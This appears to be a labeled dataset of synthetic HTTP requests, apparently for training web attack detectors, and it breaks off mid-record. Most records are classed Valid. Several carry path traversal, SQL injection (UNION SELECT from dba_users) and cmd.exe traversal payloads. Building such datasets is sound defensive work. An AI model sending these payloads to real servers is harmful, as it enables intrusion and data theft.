----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38373
Start - Id: 32776
class: Valid
POST /ktgTUcatinclude5/isu/ahyasmqlayHSo/tERO/mLm5pRUUzK/RvesVrn9lmhrdieny.bin? HTTP/1.0
Content-Length: 133
Content-Language: me,sGizs
Content-Encoding: compress
Content-Location: http://grdn.fr/ts0t/haszo/eLr2hqe0/aec3j5nt/misbi6fp.bin
Content-MD5: cmk4d2JzY2F0YUNEbWVPVA==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 06 Jul 08 22:23:20 GMT
Last-Modified: Tue, 15 Nov 05 11:15:55 UTC
Host: www.fnrrR.biz
Connection: keep-alive
Accept: */*;q=0.4
Accept-Charset: cp-932;q=0.5, x-mac-arabic;q=0.2, x-mac-hebrew, iso-8859-7;q=0.8, windows-874
Accept-Encoding: identity;q=0.2, compress, compress;q=0.9, identity, gzip;q=0.4
Accept-Language: ohanSl-woyi
Cache-Control: only-if-cached
Client-ip: 105.0.171.235
Cookie: sui=957876;pecirLi0srl=bosr
Cookie2: $Version="575"
Date: Sun, 29 Jan 06 22:22:13 UTC
ETag: "VHeqkJ0KxUWv2OHucF"
Expect: awpcudhy
From: rlqIk4dm@uargnnoar0.it
If-Modified-Since: Tue, 02 Feb 10 07:08:40 CET
If-Unmodified-Since: Thu, 15 May 08 16:30:06 CET
If-Match: *
If-None-Match: *
If-Range: Wed, 12 Sep 07 12:24:09 UTC
Max-Forwards: 87
MIME-Version: 7.8
Pragma: ic5si3n='G4emiegr'
Proxy-Authorization: Basic TG83aUk6Y3h4ZWE4Y3A=
Authorization: Digest response="4eBbaEDCFd8Adb30DEcfb719e9C2BDB6"
Range: 7780-1621,55-
Referer: /orcej/sEaezt.doc
TE: trailers,trailers
Trailer: Trailer
User-Agent: 6osqoppegi46jEanr3w
UA-CPU: x86
UA-Disp: 2397,8345,8
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 4217x4135
Via: FTP/3.0 105.172.88.236, 4Es/7.6 215.4.15.19, 3.6 232.203.123.227
Transfer-Encoding: identity
Upgrade: teeo23/2.3, xnsmm/4.8, ier/8.7, vw4/5.1, a5enee/7.1
Warning: 585 232.224.186.123 "moFEY6Tiefdaxpeea5e" 
X-Forwarded-For: 4.132.206.75
X-Serial-Number: 635173454093357601
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

8Tfouie=eushutdowntw&d6stw=sh0a&kwRSf=566&tnet=soRuxkx7q&3Tiin=ea7rpshutdownlc&bcshiexnosp=slXeZjf7w9U&b4h3lOcK2M=5ztlSGwHMz&pnp=hAzI

End - Id: 32776
Start - Id: 44888
class: PathTransversal
GET /@VbuniongrwR75E/sgoi1hopWoycoiuir7a/eOcm.vp_dbfH/Msar9aAiksu/bLunirvxhtdhtrot/C1tnogRtarfa.aspx?shun0zutPdDooiE=.%2F..%2F.%2F..%2F&ANv=aiDEdteh%3ErselectxtermH3w%3Fnia%26 HTTP/1.0
Host: 19.170.124.77
Connection: mSas4pd
Accept: application/*;q=0.4, text/plain
Accept-Charset: *;q=0.2
Accept-Encoding: 
Accept-Language: ca-nhsaf;q=0.7, sta264O-rlseCo
Cache-Control: no-store
Client-ip: 28.173.55.36
Cookie: teee14ku=1wgeten6;6Q8HKZAhttpsAw=h@linputtSh0oiie;neioehuiatEw7s=1157
Cookie2: $Version="973"
Date: Sat, 01 May 10 09:58:09 CET
ETag: W/"tIHhbmSuiGV1mULHe7Fs"
Expect: eaqhh8
From: lalrk0d@mOge.gov
If-Modified-Since: Wed, 14 Feb 07 07:17:28 UTC
If-Unmodified-Since: Fri, 18 Jun 04 15:55:03 GMT
If-Match: "WBL@5hL_Hit7g2QoC.p"
If-None-Match: "YwPpLdZ1bO4bAKEHs"
If-Range: Sun, 26 Feb 06 08:22:13 UTC
Max-Forwards: 191
MIME-Version: 2.7
Pragma: nE=R3r
Proxy-Authorization: Digest opaque="nwijehr"
Authorization: poas tawttt=ea46
Range: -129
Referer: http://www.lpttewFe.uk/vi5c4eii/96haots/reeets/nwjo2r7.msf
TE: trailers,chunked,gzip
Trailer: Expect
User-Agent: Mozilla/5.9 (Machintosh; U; Mac OS X 0.7; ss-ic; rv:3.9.7) Gecko/02340848
UA-CPU: x86
UA-Disp: 4734,136,8
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 6797x3315
Via: 4.7 www.cllssyk.tiff
Transfer-Encoding: identity
Upgrade: a04E/0.2, dOen6p/3.6
Warning: 919 218.70.108.162 "ndpaastlweaihe5" "Thu, 07 Apr 05 15:20:50 UTC"
X-Forwarded-For: 74.214.158.51
X-Serial-Number: 055847
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 44888
Start - Id: 41830
class: SqlInjection
GET /Wk8.pl?jTEo=9057604&euroahtunhttSr=eibatg3&n7cil=woetf5xqsTaeeeuN&1h=226015&ie=imorh+ty&ulhrs=chairs%27+++UNION+++SELECT++++lcnAtxat+FROM++++dba_users+++++WHERE++name+like+++++%27%2525&fn=Qudlnae3ui HTTP/1.1
Host: www.sp8eosetl.de
Connection: keep-alive
Accept: text/*;q=0.9, video/*;q=0.1
Accept-Charset: cp-936;q=0.2, iso-8859-4;q=0.4, x-mac-icelandic;q=0.9, iso-2022-jp;q=0.2
Accept-Encoding: 
Accept-Language: *
Cache-Control: alfr5ot='mriaLl'
Client-ip: 196.90.56.27
Cookie: T2tEahros9c=~;U.ZJGMCmzHL-=imabt access_logwherelink
Cookie2: $Version="45"
Date: Thu, 18 Mar 10 23:55:57 GMT
ETag: W/"sEO6-Hh4WcNew12P"
Expect: jao4e=iser
From: wIdO@lerc.gov
If-Modified-Since: Tue, 20 Dec 05 08:55:46 GMT
If-Unmodified-Since: Thu, 05 Jul 07 20:59:01 GMT
If-Match: "uksNWcbA@zsg4cd"
If-None-Match: "s3oQO.K0pDBrHcoMoKeU"
If-Range: Fri, 14 May 04 23:16:24 CET
Max-Forwards: 0241
MIME-Version: 5.5
Pragma: no-cache
Proxy-Authorization: NTLM ZDhzdGFlcmRSaGlvNXR5aW9tMHFkU3JpY2VpaXV5ZW56Y2Rsbw==
Authorization: NTLM NG1lc29vaHRGd3F0ZWxzZWc5YnJlY3NhaWlvMmpuaDlzbGVlYm1uRWU0bnlt
Range: -0842
Referer: http://www.teiihoto.org/rntVsem/nhnd/lpaech.css
TE: trailers
Trailer: Max-Forwards
User-Agent: aHecdB
UA-CPU: StrongARM
UA-Disp: 0572,127,8
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 5914x483
Via: HTTP/1.6 www.o2o2rtes.gif, 0.4 61.159.11.145
Transfer-Encoding: compress
Upgrade: hcsrst/2.9, leHto/5.0, t6B/6.8, iheSt/9.4
Warning: 186 127.58.150.59 "ns2cjsi" "Mon, 05 May 08 16:07:50 GMT"
X-Forwarded-For: 206.140.252.134
X-Serial-Number: 431124702375
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41830
Start - Id: 10586
class: Valid
GET /na0e6nqzodvhumtjcema/vEshama/utdesestw/5eyrCtrEh/DW1Mopen1qSHp1.asp?7dmJe87=365275610&rawwbe5atp=SEue+3htaccesoTet+n&ehyl1er=6&72tEn2yaudoI4ix=eji&eha2jeIh5sih4=eO11lm&cEatt=644016&59scriptrwqK=ip4J8.ovtOZ&eibtryyunyi78=yiUwcx HTTP/1.0
Host: 28.150.212.220
Connection: ceezre
Accept: image/jpeg;q=0.3
Accept-Charset: x-mac-chinesetrad
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-store
Client-ip: 245.176.39.251
Cookie: wLirfateed=mrCE2@m;bklfumE3lhehian=updatejlte0httpscopys;eiNniwsit=ohtaccesso;lygeyttochsw=re%d  ls bw+-eq 29;rntven=493831638;elhDDrDeou=200345
Cookie2: $Version="6"
Date: Sat, 05 Nov 05 23:58:42 CET
ETag: W/"lOOiGyG8HGcYRzud"
Expect: raar
From: mohdrcal@8y7xh.de
If-Modified-Since: Tue, 13 Apr 04 06:09:42 GMT
If-Unmodified-Since: Sat, 20 Dec 08 15:05:15 CET
If-Match: "xk_BiZWMzF.Y9hsWwr"
If-None-Match: *
If-Range: *
Max-Forwards: 3
MIME-Version: 8.8
Pragma: uiiSb=gDNciTib
Proxy-Authorization: Basic dU9vZGF4bGg6ZE9nc3I=
Authorization: syes otesaxn=siewcre
Range: 13113-277,3-670,8449-3
Referer: http://eeian.com/dncRykpl/erztcb/aebp/5tl5.asp
TE: chunked,trailers,chunked
Trailer: Authorization
User-Agent: sQeJdQ@ http://www.na3iduu.uk
UA-CPU: x86
UA-Disp: 4066,570,8
UA-OS: Linux
UA-Color: color32
UA-Pixels: 170x2008
Via: 7.5 125.153.104.188, eii/6.6 161.182.230.77
Transfer-Encoding: deflate
Upgrade: Een/6.5, oelp/1.9, pepbl/8.4, hcTat/2.7, Uihj/0.1
Warning: 101 www.lSyoa.html "se09rYrre6" 
X-Forwarded-For: 109.176.189.188
X-Serial-Number: 340706
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 10586
Start - Id: 45381
class: PathTransversal
POST /tFbU1Y7/yp6U.css? HTTP/1.0
Content-Length: 113
Content-Language: pa,cploimv
Content-Encoding: compress
Content-Location: http://e4slsn.it/nhttocy/jolsoiE/wtc1eo/smooeaOe.shtml
Content-MD5: emVhYW9tYk5sNHNDdGVhYg==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 06 Mar 07 02:30:05 UTC
Last-Modified: Thu, 06 Oct 05 09:49:02 CET
Host: 247.28.203.194:80
Connection: keep-alive
Accept: application/x-tar;q=0.9, application/*
Accept-Charset: *;q=0.9
Accept-Encoding: compress, identity;q=0.8, deflate;q=0.9, compress
Accept-Language: ao-roeraaxd, oq-enattt, ys-oeoojn;q=0.4, qktrfn-la6r3o3s;q=0.8, n0F-en;q=0.3
Cache-Control: no-transform
Client-ip: 219.120.83.225
Cookie: xSJbBs8BhTW=99;tl=26746;r7=:len
Cookie2: $Version="96"
Date: Wed, 21 May 08 07:45:00 CET
ETag: "wVrkReDNDk8Y9C5UF@3O"
Expect: 100-continue
From: nnrEog@dpyieuR.com
If-Modified-Since: Thu, 10 Jun 04 14:12:45 UTC
If-Unmodified-Since: Thu, 19 Jun 08 02:02:44 CET
If-Match: ".8OJH7-Crdvuffy_wPn"
If-None-Match: "DF49oJ3fqIoHh-M"
If-Range: Tue, 24 Mar 09 03:15:55 GMT
Max-Forwards: 00
MIME-Version: 2.6
Pragma: no-cache
Proxy-Authorization: NTLM cGVsYW9ldGxJMjRyb21pc2lpYXhpbWxyZG5lZHVsc2VpN2FlSGM=
Authorization: Basic ZXJldHI6Y3ppZWU4cG8=
Range: 0524-
Referer: http://www.belhui.biz/taMi/relyNne/mtOOu.sh
TE: gzip,deflate,trailers
Trailer: Max-Forwards
User-Agent: Mozilla/7.4 (Windows; U; Windows NT 4.2; ad-pu; rv:3.0.8) Gecko/81929040
UA-CPU: Sparc
UA-Disp: 721,775,32
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 789x027
Via: 2.3 www.vt43f.tiff
Transfer-Encoding: gzip
Upgrade: y6otbe/1.0, A4me31/2.9, Aloea/2.4
Warning: 851 99.105.244.225 "ewewAqyftpmnve" 
X-Forwarded-For: 177.133.223.189
X-Serial-Number: 37550564020499
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

oet=AeoyZg6jafub&tozUr=/../../../../../../../Inetpub/iissamples/taan/atsinsli/al/si.asp

End - Id: 45381
Start - Id: 4678
class: Valid
PUT /w_vzM9/aenbttehta1d/freeaeldtZYiosBiMaH/ehEcdenRrryoheat/1o8t/nr9y5odseQ/6kkkc1FC/h35Hi5MGaEc09ia/cM3zSDszJPSDsU.nsf? HTTP/1.1
Content-Length: 311
Content-Language: eroaia,6t,tb0aohes
Content-Encoding: deflate
Content-Location: http://www.ineges.cz/hiod/3lyt4rt/rrnedi.mpg
Content-MD5: ejRuZjlsaHBlaG1maEhrZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 24 Feb 04 13:50:05 CET
Last-Modified: Sun, 04 Apr 10 05:32:44 GMT
Host: www.dmohauo.org
Connection: close
Accept: video/quicktime
Accept-Charset: *;q=0.2
Accept-Encoding: deflate;q=0.9, identity;q=0.0, gzip;q=0.4, compress, compress;q=0.8
Accept-Language: drek-Erg5rd
Cache-Control: no-cache
Client-ip: 12.88.180.100
Cookie: fiesraf=2]t;rDlcdayuhnqUya=c74tqAlTTrB;0ety5=+w1;4pe5=18623538
Cookie2: $Version="2"
Date: Fri, 28 Nov 08 20:24:42 UTC
ETag: "QcCCVXE.RUAyTkJHJq8A"
Expect: 100-continue
From: 5FsjeuC@Tne6Halils.it
If-Modified-Since: Wed, 18 May 05 20:56:29 GMT
If-Unmodified-Since: Thu, 12 Feb 09 24:26:27 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 796
MIME-Version: 3.8
Pragma: no-cache
Proxy-Authorization: hldtn eieme=dloheAoy
Authorization: Basic aWlsdzl0OmxmYWZkaQ==
Range: 511-,489649-576168,-523
Referer: /hmll/1no7glu/o6wle/sdeeuNc/an76.php3
TE: trailers,trailers,chunked
Trailer: Pragma
User-Agent: Mozilla/3.2 (compatible; MSIE 1.3; Solaris; seb3cMIwot; mndgfeeu)
UA-CPU: 68000
UA-Disp: 860,425,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 561x7800
Via: FTP/6.9 250.105.206.85, 7.2 www.Etfsi.png, ICe/5.3 www.naiac.css
Transfer-Encoding: identity
Upgrade: cdZ/6.2, tOo2/2.7, neA/5.6, es0/1.8
Warning: 536 10.92.102.202 "5tc0ut6" "Wed, 19 Aug 09 01:08:40 GMT"
X-Forwarded-For: 112.130.112.55
X-Serial-Number: 2125001
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

e2th=azf7hDWIz&hrcoatlqto=lbnztnPsdOuevalaxd&__dN6YCFn=m>dhYbcd&iu=aal3rxmlt&.htpass7w=83extsxbtpayTo&eua0ucoi=n2Hjp6&vJPgBRz=vleknyuowvOqEe&Yp40o.CXV=aEFo2&rgqtninmay=5jzfda4fH2xene0ci&MincludeB3UT-all=sjuqaOAS&VCT68q0phphttps=kpassthru>&m9otno=hpzneGea&rae6bsagemnn=094832183&gnyohp7yh=tmp&kiyunors=<aAE

End - Id: 4678
Start - Id: 13156
class: Valid
GET /zRrinN5RUipob8eP.htm? HTTP/1.1
Host: www.wtrtlt.cz
Connection: close
Accept: video/mpeg;q=0.2, video/*, video/quicktime
Accept-Charset: iso-8859-9;q=0.3, cp-936;q=0.3
Accept-Encoding: deflate, gzip;q=0.7, gzip
Accept-Language: *
Cache-Control: max-stale
Client-ip: 74.65.3.173
Cookie: f0eosBed7= g
Cookie2: $Version="08"
Date: Thu, 07 Jun 07 11:52:39 CET
ETag: W/"P8rNSL5HVu3tWde"
Expect: wEt2mh3
From: ibuest@tharmq.fr
If-Modified-Since: Mon, 18 Jun 07 06:30:50 GMT
If-Unmodified-Since: Thu, 08 Feb 07 06:20:35 GMT
If-Match: "66nIiUidlRLxcTjK_M7"
If-None-Match: "UciD0zCslT4vWbW3-"
If-Range: *
Max-Forwards: 0818
MIME-Version: 8.5
Pragma: tdautse0='zimdE6Is'
Proxy-Authorization: Digest realm
Authorization: Digest qop=indiwsn
Range: -22,686-,439169-
Referer: /bi08helr/Aoomaolo.swf
TE: deflate;q=0.8,trailers
Trailer: Max-Forwards
User-Agent: Mozilla/5.8 (X11; U; Open BSD i586 1.8; be-bw; rv:8.4.4) Gecko/05094178
UA-CPU: Sparc
UA-Disp: 806,0738,16
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 6456x555
Via: 5.5 182.21.250.254
Transfer-Encoding: hape; 7sTapit=ojHast
Upgrade: r7hret/3.9, mve/5.9, oiIbha/2.2, anpn/6.2, voe9h/2.5
Warning: 728 164.233.246.188 "twrTee9rEu95arsato" "Tue, 26 Oct 04 22:26:31 GMT"
X-Forwarded-For: 141.250.177.130
X-Serial-Number: 74489
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 13156
Start - Id: 22419
class: Valid
GET /8InEg3fQeval/hiDKBm1/0Kw6childcUOvns7Lwget/Md/2735/tugl6t28itsniiddeea/kZ./0Oalw/yloNOXBvfT_xupKJ0rml.asmx?3ocagdi7=+ntpjskan&TEfhbstfko=3574623&geuaqtTdeflbr=15777&tPhneOi=12&dieefuiBe=eo8-n&rldraeRswp=83264&rt5qhpeehma2tb=t55Omjy%40iK&h7_RIrN=eschnwessu&sdg9dheklenoe=lz%7Ebnto&viefrAininamuh=e48gt0homeopeno%3Ao67a&t0siri40eI1enep=tw5CYqvpTnh&uoth0seioeCeth=eroi%24h2hcmdnoXadvar&LczicdRw=913105192 HTTP/1.0
Host: www.htea1qccge.org
Connection: close
Accept: */*;q=0.4
Accept-Charset: *;q=0.3
Accept-Encoding: 
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 98.49.103.36
Cookie: Czy_U=m;eIad9nats0eas=cq-Vm6-uf1.K
Cookie2: $Version="02"
Date: Sat, 03 Apr 04 13:36:36 CET
ETag: W/"6TvwSmuDLmRJ-V-EJ"
Expect: ld5e=9opldz
From: 3aib@giJsx.uk
If-Modified-Since: Wed, 09 Mar 05 06:31:31 UTC
If-Unmodified-Since: Sat, 20 May 06 06:24:50 CET
If-Match: "ZQ9Jr2SS2ly6n@Bsp"
If-None-Match: *
If-Range: Mon, 14 Nov 05 14:58:46 CET
Max-Forwards: 66
MIME-Version: 5.6
Pragma: exhq='ti3hd'
Proxy-Authorization: NTLM c3NlOG5yZU50bWVIeWxuaWx4NWlldWFvaTFxZW5sYjZhVHI=
Authorization: NTLM dGphYWhBcmVlN3RraXRzMG1Fc2dlMmdpcnRlRWlxYTNzdXJyRnlp
Range: 3-,571966-803988,77865-92138
Referer: http://www.on3p.uk/mti5i/sh7h0ndU/oiiEt/Robl.gif
TE: trailers
Trailer: Referer
User-Agent: Mozilla/7.8 (compatible; Konqueror/8.2; WinNT; renos0; nOunel; ebbei)
UA-CPU: x86
UA-Disp: 1777,9655,16
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 112x1566
Via: vnmb/0.6 www.an0b.jpg
Transfer-Encoding: er9a; izulheee=g8boe
Upgrade: ioit8a/2.3, ldiu/6.1, uEu/1.0, AH6/0.7
Warning: 736 www.eLwneah.shtml "l38ruhse" 
X-Forwarded-For: 112.96.205.75
X-Serial-Number: 935727491848892765
----: ----------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 22419
Start - Id: 44695
class: PathTransversal
PUT /ep.nsf? HTTP/1.1
Content-Length: 248
Content-Language: engs,4sts,oli
Content-Encoding: compress
Content-Location: http://peoa.st/jBktme/klueh/oegrcee/eIEk/tiocwA.asp
Content-MD5: Y2RocmhvNHJlc2lsRW5lMg==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 28 Sep 06 06:10:41 UTC
Last-Modified: Sat, 15 Jan 05 18:45:07 CET
Host: www.rdgpmn.cz:80
Connection: close
Accept: image/*;q=0.1
Accept-Charset: windows-1258;q=0.5, iso-8859-6;q=0.4, iso-8859-2, utf-8
Accept-Encoding: identity;q=0.5, deflate, identity;q=0.9
Accept-Language: stxhah-ymesund, nuYttL-Seelxa;q=0.6, n-azvvS
Cache-Control: no-store
Client-ip: 11.102.132.216
Cookie: onytsai7iet=l;09ukQ4NV7s2=3465;inorFnh4=3;iw6amgoaEheytn=r9tecsaKsrlIzF
Cookie2: $Version="90"
Date: Wed, 06 May 09 02:53:13 CET
ETag: "RHf0qrb9mHL2t__f2YB"
Expect: 100-continue
From: nC0otao@cuVsd.gov
If-Modified-Since: Fri, 02 Jul 04 24:37:04 CET
If-Unmodified-Since: Tue, 01 Dec 09 16:18:34 GMT
If-Match: *
If-None-Match: "SxwS.Y-e6CXloS1Q"
If-Range: "VL_aKdgyjxkQsD-z"
Max-Forwards: 1719
Pragma: hs='tyen'
Authorization: NTLM OW5sczlldGxBaGYzY2luZWJmc3ZmZXRvcnl0bWRlMW9oeWE=
Range: 2168-,8-1607,73-
Referer: http://2tn47.be/aeEtx/ieoa.png
TE: trailers,trailers,gzip
Trailer: If-Unmodified-Since
User-Agent: hbDWcjMbzk http://www.esrw.ch
UA-CPU: StrongARM
UA-Disp: 7865,313,32
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 136x0173
Via: 3.1 www.etw4Mrsh.htm, nvgao/4.9 www.fofr9w1n.gif:971, 5.4 www.anRr5.htm
Transfer-Encoding: deflate
Upgrade: eeew/6.4, 8ei/8.8, dN4/7.3, mAm9/3.5
Warning: 629 183.2.112.153 "z4na" "Sun, 11 Oct 09 15:34:16 GMT"
X-Forwarded-For: 121.97.240.234
X-Serial-Number: 175251
----: --------------

s7NttomlA50=iOrONs0uV&5C6oxRMNboot.ini=n L4yit)ewlElikewp-Lc&sQzt0=eyuustzipb&emttdn=hdVbyq6&bshzeoFzmtyl=436432&fm=966&oedtherdL8=we6h3id&vnskLand0L=x1oN8&IGea2=8393&atomiuFr=axers&HI0A7L=276&8np7=7258992&tybvemKs=../../../esni/admin.txt

End - Id: 44695
Start - Id: 31318
class: Valid
GET /wsfcerltqEotYeplT/ke/nF/lBcHVig4zDtZ/c1SuJrZ1sI8BLDX_FX/rngrTkqz-Fm5xjTv/rfsu0r/ajXg1_q9xd1CEtGL.shtml?EHfhavingJC=f%40nfj+%24pe&sauo2ibezla=hTzirj7exnssQT&jiehabosoHrityH=+y%40ey&2tfbo=6&88=9ei&srttScU=%3FgEef&trlyR=8DU%40l&RFefefromuhtpass=eafod&OEYnull07IconnectBodeleteservices=6296&etEw=b&be=0sordIapetspiby8+9position&echec=dAB2EZjXl6&lv6=tcrm%29%3BuIca&jNE2into=i9SJ9f_-6HQI HTTP/1.0
Host: 249.111.154.177
Connection: close
Accept: image/gif
Accept-Charset: windows-1254;q=0.2
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-age=37750
Client-ip: 11.82.181.12
Cookie: cmdHjB-fo=yt? ;rSs=168029;puuu=4
Cookie2: $Version="7"
Date: Thu, 19 Mar 09 12:15:49 CET
ETag: W/"Z9JS-k@tViOl7jT"
Expect: 100-continue
From: rgc6ndo@etox.net
If-Modified-Since: Fri, 22 Jul 05 16:19:36 UTC
If-Unmodified-Since: Thu, 26 Feb 09 21:14:20 UTC
If-Match: *
If-None-Match: "TFRRMJCIJ3JBLAvgPZNQ"
If-Range: *
Max-Forwards: 68
MIME-Version: 3.0
Pragma: no-cache
Proxy-Authorization: Digest username="0himts4o"
Authorization: NTLM VHRRbW5veHNwckpsYXJub25kb3FlNWV3ZWllb2xXaGxnY2k=
Range: -388719
Referer: http://58omk3oe.com/of8sa/fobc5bA/apsN.cfm
TE: chunked;q=0.7,deflate;q=0.5
Trailer: If-Range
User-Agent: wEgOQNZDA http://www.rlee7c.ch
UA-CPU: MIPS
UA-Disp: 1773,6929,8
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 3795x126
Via: FTP/9.0 56.208.145.168
Transfer-Encoding: deflate
Upgrade: dGeost/2.9, rda/6.8
Warning: 107 www.ohem.gif "gsElmnsdshO7" "Wed, 21 Mar 07 14:34:20 GMT"
X-Forwarded-For: 45.216.230.89
X-Serial-Number: 61504
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 31318
Start - Id: 36632
class: OsCommanding
GET /iisadmpwd/..��..��..��..��..��../winnt/system32/cmd.exe?/c+ HTTP/1.1
Host: 95.50.219.180
Connection: close
Accept-Charset: *;q=0.0
Accept-Language: *;q=0.5
Cache-Control: no-cache
Client-ip: 159.33.177.101
Cookie: ileDrge=os 
Date: Tue, 14 Oct 08 20:44:01 UTC
If-Modified-Since: Wed, 17 Mar 10 15:28:16 UTC
If-None-Match: "Ufdhr.dMyM-8_Be"
If-Range: "weAXubksETS8uuD"
Max-Forwards: 0153
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: NTLM cmNlcGdhbnd0b29yM25lYWlvZWVFYWQyYXJtWXNlbkRhbXJqaDRsaWV3
Referer: http://tuehme.net/icmeq/e7mbis/leeilss/emind.ace
User-Agent: 4WqCrA http://www.T8u4yl0E.com
Upgrade: tanoeu/5.3, o1rivx/6.2, nfr/2.4, tnwl/0.9
X-Forwarded-For: 43.56.144.162

null

End - Id: 36632
Start - Id: 31317
class: Valid
GET /T2dEtmpLe-pUshutdownEH/czHa151@NZPTF7SuUv5/tetsenyiSye/tbkb.QQZdNto03VK1TLs/rY/iBCTF7Kot4/iprelbGsw/3hbvJduV5E4_I@.php4?Auaytraosfr6pl=include6he%3Cs+u%3Bti&occAipdnfpncraw=tNxp_%7E%2Bne%26pine&vder6ihwse=13&87k5ywp-bwformRRW=do1ni&etueheinyn4on=9eZcY4t_ig&btteot4LGkp7sE1=e5dqecG6ttaedgpb&ejeirtNo1=eobkn&Mexgeaszhpenen=cpasswdes&6umiiJiitsE=mSReleJHS6u_&roNxtimSq=0835&xtx4rsirraYpdea=5487483422 HTTP/1.1
Host: www.cnsurm.net:80
Connection: keep-alive
Accept: */*
Accept-Charset: euc-cn, iso-10646-ucs-2;q=0.7, utf-7;q=0.4, iso-8859-5;q=0.4
Accept-Encoding: *;q=0.8
Accept-Language: *
Cache-Control: max-age=37750
Client-ip: 11.82.181.12
Cookie: cmdHjB-fo=yt? ;rSs=168029;puuu=4
Cookie2: $Version="7"
Date: Tue, 26 May 09 13:08:41 CET
ETag: W/"Z9JS-k@tViOl7jT"
Expect: 100-continue
From: rgc6ndo@etox.net
If-Modified-Since: Fri, 22 Jul 05 16:19:36 UTC
If-Unmodified-Since: Thu, 26 Feb 09 21:14:20 UTC
If-Match: *
If-None-Match: "uY7fGN_YnPcGe7IQVS"
If-Range: *
Max-Forwards: 5108
MIME-Version: 3.0
Pragma: no-cache
Proxy-Authorization: Digest cnonce="rnibihas"
Authorization: NTLM VHRRbW5veHNwckpsYXJub25kb3FlNWV3ZWllb2xXaGxnY2k=
Range: -388719
Referer: /e43n7oMe/0sispth/nfieEieh/2mNnno.aspx
TE: chunked;q=0.7,deflate;q=0.5
Trailer: If-Range
User-Agent: ouztlseer (4cqNgvo@; eCxtVNcRWW; 3B8AhG8)
UA-CPU: MIPS
UA-Disp: 1773,6929,8
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 3795x126
Via: FTP/9.0 56.208.145.168
Transfer-Encoding: gzip
Upgrade: dGeost/2.9, rda/6.8
Warning: 107 www.ohem.gif "gsElmnsdshO7" "Wed, 21 Mar 07 14:34:20 GMT"
X-Forwarded-For: 45.216.230.89
X-Serial-Number: 61504
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 31317
Start - Id: 28029
class: Valid
GET /st/mkewxyDaroereTye/rFMr8qsgo4yw/3TOi1dmayyQwUQBW4JXz/taiciutys/nakjGKpbP9QfyKzkn.mdb?4lag6=1934576&xSbAW=302&tttdfE=3470239920&d7ifuln7c6hN=epZl9F7t3P&8rsye=%2Ft&cO3T=7475&sstadt=33048315&jedevlnmmeteap=hokwn3nkKUaxYi9i&pstp=sof4moVMma&t1goyipg6=oLg&wtwtratlsoe=24532446&MmI4z-ddDI=6 HTTP/1.1
Host: www.cee2cYfye.it
Connection: close
Accept: video/*;q=0.8
Accept-Charset: *
Accept-Encoding: identity;q=0.8, compress;q=0.6, deflate
Accept-Language: *;q=0.6
Cache-Control: no-cache
Client-ip: 219.159.73.58
Cookie: hti4bsiuaoxnalj=4;teuknedh4=ft
Cookie2: $Version="9"
Date: Mon, 17 Aug 09 06:39:52 UTC
ETag: W/"C5s5DELR3662.cu_7@"
Expect: Nhgte=rocNr
From: gu9cDaia@ar6it9.st
If-Modified-Since: Fri, 04 May 07 16:16:33 CET
If-Unmodified-Since: Wed, 12 Jan 05 08:04:09 GMT
If-Match: "EQc.f--8PhvF2.fJ"
If-None-Match: "MWmYiSFeW9ByJJ24ovP"
If-Range: "2jERk.xlDRPErv.5Zn"
Max-Forwards: 4
MIME-Version: 8.8
Pragma: Ensl=auztg
Proxy-Authorization: NTLM QTRjYWFhd3RhNHlnT2l0aWNvaWkxc3JoVG9ndGFhaWRscjhySGF0aG90
Authorization: NTLM c3lmbm9ncmxuZlc4b3VpdHVxOGl0Y0FsbDRHb3dvNE1zc3R3eWlGb0xlcndpYVFs
Range: 423138-8,594351-,3-756362
Referer: /iseeU/ectda/hgoW/aIrs.shtml
TE: trailers
Trailer: If-Range
User-Agent: Mozilla/0.0 (compatible; Konqueror/7.8; SunOS sun4u; ngSllmade)
UA-CPU: PowerPC
UA-Disp: 6297,097,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 4477x7117
Via: HTTP/4.1 203.51.30.203
Transfer-Encoding: 5wCH; gWhi0=EsfaEree
Upgrade: 9htud/6.5, uadanh/4.9, euxd/5.9
Warning: 759 www.rcgyueh.tiff:5 "wolidasoknadsaeahf" "Sun, 27 Jul 08 14:28:37 UTC"
X-Forwarded-For: 140.27.28.161
X-Serial-Number: 45504056220
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 28029
Start - Id: 6259
class: Valid
POST /snXiz7ZNLxP@GNAp.msf? HTTP/1.0
Content-Length: 132
Content-Language: udn,slMwpi,8n
Content-Encoding: identity
